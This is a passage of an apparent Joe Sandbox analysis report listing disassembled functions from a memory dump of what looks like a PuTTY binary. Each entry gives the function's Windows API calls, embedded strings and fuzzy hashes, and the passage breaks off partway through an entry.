                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Message$ItemSend$Window$_strlen$ActiveBeepDestroyParentText
                    • String ID: %s Event Log
                    • API String ID: 2560716093-583241876
                    • Opcode ID: 5a1e2eaa81747f02b558cf1ff75496e17e9d379b237f631ef6b1fc93c53e775b
                    • Instruction ID: 90f56530f911594dad1af1558e30645177f3d4252956af9ea22ff893bbe4bba6
                    • Opcode Fuzzy Hash: 5a1e2eaa81747f02b558cf1ff75496e17e9d379b237f631ef6b1fc93c53e775b
                    • Instruction Fuzzy Hash: 3991E071A04300EBE721AF20EC96F6E33E8EB54704F08066DF956DB2A1D674ED44CB96
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C403D0 Relevance: 21.7, APIs: 1, Strings: 11, Instructions: 663COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strlen
                    • String ID: ", algorithm=$", nc=$", qop=$", realm="$", uri="$, cnonce="$, nonce="$, opaque="$, response="$, userhash=true$username="
                    • API String ID: 4218353326-1072239674
                    • Opcode ID: 84372c40716ae2ac238274a63ec8d7c3fd9899cb6282e097ca8ff500e0f48f7a
                    • Instruction ID: 2397f8863a8c84f8421793e9cb2a8d362ee2729d80246249c8f87d5d91d98067
                    • Opcode Fuzzy Hash: 84372c40716ae2ac238274a63ec8d7c3fd9899cb6282e097ca8ff500e0f48f7a
                    • Instruction Fuzzy Hash: 0B3208B6804640BFD7216B50EC02E6EBBE5EF55305F484468FD8C56263EB32D624DF92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BEC480 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 118memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BEC620: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00CB32EC), ref: 00BEC69D
                      • Part of subcall function 00BEC620: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00CB32F0), ref: 00BEC6CC
                      • Part of subcall function 00BEC620: GetLastError.KERNEL32(?,00000001,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00CB32F0), ref: 00BEC6D6
                    • LocalAlloc.KERNEL32(00000040,00000014,?,00000000,?), ref: 00BEC54D
                    • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?), ref: 00BEC55D
                    • SetSecurityDescriptorOwner.ADVAPI32(?,00000000,?,00000000,?), ref: 00BEC572
                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?), ref: 00BEC585
                    • GetLastError.KERNEL32(?,00000000,?), ref: 00BEC5BD
                    • LocalFree.KERNEL32(00000000), ref: 00BEC5E0
                    • LocalFree.KERNEL32(00000000), ref: 00BEC5F4
                    Strings
                    • unable to initialise security descriptor: %s, xrefs: 00BEC5AA
                    • unable to set DACL in security descriptor: %s, xrefs: 00BEC5B8
                    • unable to construct ACL: %s, xrefs: 00BEC53B
                    • unable to allocate security descriptor: %s, xrefs: 00BEC5A3, 00BEC5CD
                    • unable to set owner in security descriptor: %s, xrefs: 00BEC5B1
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: DescriptorInitializeLocalSecurity$AllocateErrorFreeLast$AllocDaclOwner
                    • String ID: unable to allocate security descriptor: %s$unable to construct ACL: %s$unable to initialise security descriptor: %s$unable to set DACL in security descriptor: %s$unable to set owner in security descriptor: %s
                    • API String ID: 436594416-3066058096
                    • Opcode ID: 0af604cd6dee46560f7dfcec0df078e4504b7b9201f849822590d2db9ad67453
                    • Instruction ID: af656796dd527759d0c24053be452d51e86957350988577b74965d0b6dcbe97e
                    • Opcode Fuzzy Hash: 0af604cd6dee46560f7dfcec0df078e4504b7b9201f849822590d2db9ad67453
                    • Instruction Fuzzy Hash: 31414BB0604381AFEB109F26DC4AB5B7BE4FF85704F104569F98A9B3A0D776D901CB52
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C3EF00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 121pipeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BEE7A0: _strlen.LIBCMT ref: 00BEE7AB
                      • Part of subcall function 00BEE7A0: _strcat.LIBCMT ref: 00BEE7C7
                    • ___from_strstr_to_strchr.LIBCMT ref: 00C3EF96
                    • CreateNamedPipeA.KERNEL32(?,40080003,00000008,000000FF,00001000,00001000,00000000), ref: 00C3F009
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00C3F042
                    • GetLastError.KERNEL32 ref: 00C3F068
                      • Part of subcall function 00BECC90: FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,0000FFFF,00000000,?,?,?,?,00BE69BE,?), ref: 00BECD1B
                      • Part of subcall function 00BECC90: _strlen.LIBCMT ref: 00BECD26
                    Strings
                    • strncmp(pipename, "\\\\.\\pipe\\", 9) == 0, xrefs: 00C3EF79
                    • unable to create named pipe '%s': %s, xrefs: 00C3F07C
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/named-pipe-server.c, xrefs: 00C3EF74, 00C3EFA7
                    • strchr(pipename + 9, '\\') == NULL, xrefs: 00C3EFAC
                    • \\.\pipe\, xrefs: 00C3EF5D
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Create_strlen$ErrorEventFormatLastMessageNamedPipe___from_strstr_to_strchr_strcat
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/named-pipe-server.c$\\.\pipe\$strchr(pipename + 9, '\\') == NULL$strncmp(pipename, "\\\\.\\pipe\\", 9) == 0$unable to create named pipe '%s': %s
                    • API String ID: 3167155451-1267929399
                    • Opcode ID: 36fa64369b2b5b34d1e6d57772e4e2de04d01072b3875fc0b15fe0c875572bc9
                    • Instruction ID: e9fa34395cba73ca3346ec1b82e484c584288ad1c4efc47dd151989d70fb192c
                    • Opcode Fuzzy Hash: 36fa64369b2b5b34d1e6d57772e4e2de04d01072b3875fc0b15fe0c875572bc9
                    • Instruction Fuzzy Hash: A541B3B1A40300AFE330AF25DC46B177BE4EF48758F044928F94A9B2C2E7B1A5088B95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BB60F0 Relevance: 15.1, APIs: 10, Instructions: 61clipboardwindowmemoryCOMMON
                    Download Yara Rule
                    APIs
                    • GlobalAlloc.KERNEL32(00002002,?), ref: 00BB610C
                    • GlobalLock.KERNEL32 ref: 00BB611D
                    • GlobalUnlock.KERNEL32(00000000), ref: 00BB6140
                    • SendMessageA.USER32(00008002,00000001,00000000), ref: 00BB6159
                    • OpenClipboard.USER32 ref: 00BB6165
                    • EmptyClipboard.USER32 ref: 00BB616F
                    • SetClipboardData.USER32(00000001,00000000), ref: 00BB6178
                    • CloseClipboard.USER32 ref: 00BB617E
                    • SendMessageA.USER32(00008002,00000000,00000000), ref: 00BB6197
                    • GlobalFree.KERNEL32 ref: 00BB61A3
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ClipboardGlobal$MessageSend$AllocCloseDataEmptyFreeLockOpenUnlock
                    • String ID:
                    • API String ID: 1228832834-0
                    • Opcode ID: fd0aaf4794ce9c62aef94172ed3eeb0e11ff461df178ec33e7623e6af0af2d6d
                    • Instruction ID: 8a3be4051ed24cd81f50f279487262fa0c0433cdaf60cdbc5223f618e76e7eb9
                    • Opcode Fuzzy Hash: fd0aaf4794ce9c62aef94172ed3eeb0e11ff461df178ec33e7623e6af0af2d6d
                    • Instruction Fuzzy Hash: 16115171641304AFE7202F64AC0DFAE3BECEB42749F184568F687A64E1D7795C05CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BEC620 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 89memoryCOMMON
                    Download Yara Rule
                    APIs
                    • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00CB32EC), ref: 00BEC69D
                    • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00CB32F0), ref: 00BEC6CC
                    • GetLastError.KERNEL32(?,00000001,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00CB32F0), ref: 00BEC6D6
                      • Part of subcall function 00BEC330: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC367
                      • Part of subcall function 00BEC330: OpenProcess.KERNEL32(02000000,00000000,00000000,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC375
                      • Part of subcall function 00BEC330: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC3B4
                      • Part of subcall function 00BEC330: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC3D1
                      • Part of subcall function 00BEC330: GetLengthSid.ADVAPI32(00000000,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC3FB
                      • Part of subcall function 00BEC330: CopySid.ADVAPI32(00000000,00000000,00000000), ref: 00BEC41A
                      • Part of subcall function 00BEC330: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC43B
                      • Part of subcall function 00BEC330: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC44A
                      • Part of subcall function 00BEC330: LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC455
                    • GetLastError.KERNEL32 ref: 00BEC6ED
                    • GetLastError.KERNEL32 ref: 00BEC704
                      • Part of subcall function 00BECC90: FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,0000FFFF,00000000,?,?,?,?,00BE69BE,?), ref: 00BECD1B
                      • Part of subcall function 00BECC90: _strlen.LIBCMT ref: 00BECD26
                    Strings
                    • unable to construct SID for local same-user access only: %s, xrefs: 00BEC6E6
                    • unable to construct SID for current user: %s, xrefs: 00BEC6FD
                    • unable to construct SID for world: %s, xrefs: 00BEC714
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ErrorLast$AllocateCloseHandleInitializeLocalProcess$AllocCopyCurrentFormatFreeLengthMessageOpen_strlen
                    • String ID: unable to construct SID for current user: %s$unable to construct SID for local same-user access only: %s$unable to construct SID for world: %s
                    • API String ID: 3303103131-2222155745
                    • Opcode ID: 95cdaebeaf6480f581110c75879fbac406bdfdb71ec31b80fc93786255e3eced
                    • Instruction ID: 8c496efbba450451bac5b03c40a6c8e4aca49c377dc32e55eb85114d4fe95600
                    • Opcode Fuzzy Hash: 95cdaebeaf6480f581110c75879fbac406bdfdb71ec31b80fc93786255e3eced
                    • Instruction Fuzzy Hash: 2E21CFB0600381AFDB10AF65AC4AB6B3AE8EB08705F101569F846D72D1EB75D885CB93
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BE66A0 Relevance: 13.8, APIs: 9, Instructions: 325networkCOMMON
                    Download Yara Rule
                    APIs
                    • recv.WS2_32(?,?,00005000,00000001), ref: 00BE6848
                    • accept.WS2_32(?,?,00000080), ref: 00BE6898
                    • WSAGetLastError.WS2_32 ref: 00BE68A5
                    • closesocket.WS2_32(00000000), ref: 00BE68F8
                    • recv.WS2_32(?,?,00005000,00000000), ref: 00BE698B
                    • ioctlsocket.WS2_32(?,40047307,00000001), ref: 00BE69FE
                    • WSAGetLastError.WS2_32 ref: 00BE6A10
                    • recv.WS2_32(?,?,00005000,00000000), ref: 00BE6A30
                    • WSAGetLastError.WS2_32 ref: 00BE6A61
                      • Part of subcall function 00BD8D50: GetTickCount.KERNEL32 ref: 00BD8D78
                      • Part of subcall function 00BD8D50: QueryPerformanceCounter.KERNEL32 ref: 00BD8D96
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ErrorLastrecv$CountCounterPerformanceQueryTickacceptclosesocketioctlsocket
                    • String ID:
                    • API String ID: 2595003436-0
                    • Opcode ID: d5f131652d3633d91a17c949dea28720eb2e11983cde812c122420d406596e39
                    • Instruction ID: 2a1420f5ceca0a979495fe61313c68c74771f0205ae2702f83b6efb9cf937dc6
                    • Opcode Fuzzy Hash: d5f131652d3633d91a17c949dea28720eb2e11983cde812c122420d406596e39
                    • Instruction Fuzzy Hash: 80B1C075600380AFE720DF25CC85B2B77E9EF98744F14496CF99697292EB71E808CB51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BD8B60 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71fileCOMMON
                    Download Yara Rule
                    APIs
                    • GetWindowsDirectoryA.KERNEL32(?,00000107), ref: 00BD8B89
                    • _strlen.LIBCMT ref: 00BD8B90
                    • FindFirstFileA.KERNEL32(?,?), ref: 00BD8BAD
                    • FindNextFileA.KERNEL32(00000000,?), ref: 00BD8BCD
                    • FindClose.KERNEL32(00000000), ref: 00BD8BD4
                    • GetCurrentProcessId.KERNEL32 ref: 00BD8BDA
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Find$File$CloseCurrentDirectoryFirstNextProcessWindows_strlen
                    • String ID: \*
                    • API String ID: 4151488164-2355939697
                    • Opcode ID: 1997b7336eb686e7ce16332126eb4db5dd8380b677fbd6a06d20a5805b87af5b
                    • Instruction ID: 83944f92dad9a3e6268921262ab5db543ed8be2ac99e6d402c5b34003ec44891
                    • Opcode Fuzzy Hash: 1997b7336eb686e7ce16332126eb4db5dd8380b677fbd6a06d20a5805b87af5b
                    • Instruction Fuzzy Hash: 1F1106B1504210ABD2207724BC4AFDF77E8DF4A319F060424F58AD7281EB35A90587E7
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BBE970 Relevance: 9.6, Strings: 7, Instructions: 853COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/terminal/terminal.c$count234(term->screen) == newrows$count234(term->scrollback) <= newsavelines$count234(term->scrollback) >= term->tempsblines$sblen >= term->tempsblines$term->rows == count234(term->screen)$term->rows == newrows
                    • API String ID: 0-3028371564
                    • Opcode ID: bb093e90e1b5c289fc4251b17f5c6d806eab87f3caee23b2ed8d4c103032269c
                    • Instruction ID: 62a20f4621a8743d3b12bba20e21553f82926c774b069a4aced7c1304de41ad5
                    • Opcode Fuzzy Hash: bb093e90e1b5c289fc4251b17f5c6d806eab87f3caee23b2ed8d4c103032269c
                    • Instruction Fuzzy Hash: 997282B59043019FC720CF18C881BAAB7F1FF89314F1489ADE9999B352D372E955CB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BCA8D0 Relevance: 9.3, Strings: 6, Instructions: 1763COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/terminal/bidi.c$ctx->ds_sp < lenof(ctx->dsstack)$ctx->ds_sp > 0$ctx->levels[j] == irslevel$false && "how did this get past the outer switch?"$i == ctx->textlen - 1
                    • API String ID: 0-634529421
                    • Opcode ID: 789ce6975b5c2b85b0d3cfeee6d934266e9a294b5751631b8f19c63ec1280889
                    • Instruction ID: 8c37ef053a0472d461fe24ab3db8c0592063a970be4fab57cc692f6b509abfe1
                    • Opcode Fuzzy Hash: 789ce6975b5c2b85b0d3cfeee6d934266e9a294b5751631b8f19c63ec1280889
                    • Instruction Fuzzy Hash: C7E2BB75A087058FCB24CF18C491F6AB7E2FB99314F1889ADE99A8B351D731BC44DB42
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BE8420 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strlen$_strcat
                    • String ID:
                    • API String ID: 1497175149-0
                    • Opcode ID: cbf13e3ab771947de8c1a66565d23f33c68c9b69b3f5225380c1a84270f62cdc
                    • Instruction ID: 34cd7abcbb18d8035529def0e0f9099c6683a1fd3e19d9ff8577c9045010cf28
                    • Opcode Fuzzy Hash: cbf13e3ab771947de8c1a66565d23f33c68c9b69b3f5225380c1a84270f62cdc
                    • Instruction Fuzzy Hash: E311D5B1D042045BD710EB15AC81A6F73E4EF95749F09052CFC89D7341FA31EA0486A7
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C141F0 Relevance: 8.9, Strings: 7, Instructions: 178COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: Comm$Encryption$PuTTY-User-Key-File-1$PuTTY-User-Key-File-2$PuTTY-User-Key-File-3$aes256-cbc$ent
                    • API String ID: 0-287418747
                    • Opcode ID: eacac9b2b9bfdfa956c026dd5275d09ec7af0640dc45bfc318c0225910c4a655
                    • Instruction ID: c388b1e45fb47c64f7a87c7205c556ff6b8af6389679ff6b575e1378b9ca7a7e
                    • Opcode Fuzzy Hash: eacac9b2b9bfdfa956c026dd5275d09ec7af0640dc45bfc318c0225910c4a655
                    • Instruction Fuzzy Hash: FE5148B1A0430057D7389A29A846BAF73E25F83304FC4492CF87A87251EB75DAC6F253
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C689F5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON
                    Download Yara Rule
                    APIs
                    • GetLocaleInfoW.KERNEL32(?,2000000B,00C683D4,00000002,00000000,?,?,?,00C683D4,?,00000000), ref: 00C68A8E
                    • GetLocaleInfoW.KERNEL32(?,20001004,00C683D4,00000002,00000000,?,?,?,00C683D4,?,00000000), ref: 00C68AB7
                    • GetACP.KERNEL32(?,?,00C683D4,?,00000000), ref: 00C68ACC
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: InfoLocale
                    • String ID: ACP$OCP
                    • API String ID: 2299586839-711371036
                    • Opcode ID: 4a840f206c85c2749fd80ade7c175e40ecddbcf7cbe8e12113ad089ba0ed0972
                    • Instruction ID: 4cb8996fbdd6ea1e60efacea4976f783248f13f98fe0d5325a237f3411c655d0
                    • Opcode Fuzzy Hash: 4a840f206c85c2749fd80ade7c175e40ecddbcf7cbe8e12113ad089ba0ed0972
                    • Instruction Fuzzy Hash: C821D022600101ABDB348F95C980B9773AAEF54B54B568666EE1AD7602FF32DF48F350
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BECC90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76windowCOMMON
                    Download Yara Rule
                    APIs
                    • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,0000FFFF,00000000,?,?,?,?,00BE69BE,?), ref: 00BECD1B
                    • _strlen.LIBCMT ref: 00BECD26
                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,?,?,?,00BE69BE,?), ref: 00BECD40
                    Strings
                    • (unable to format: FormatMessage returned %u), xrefs: 00BECD47
                    • Error %d: %s, xrefs: 00BECD5D
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
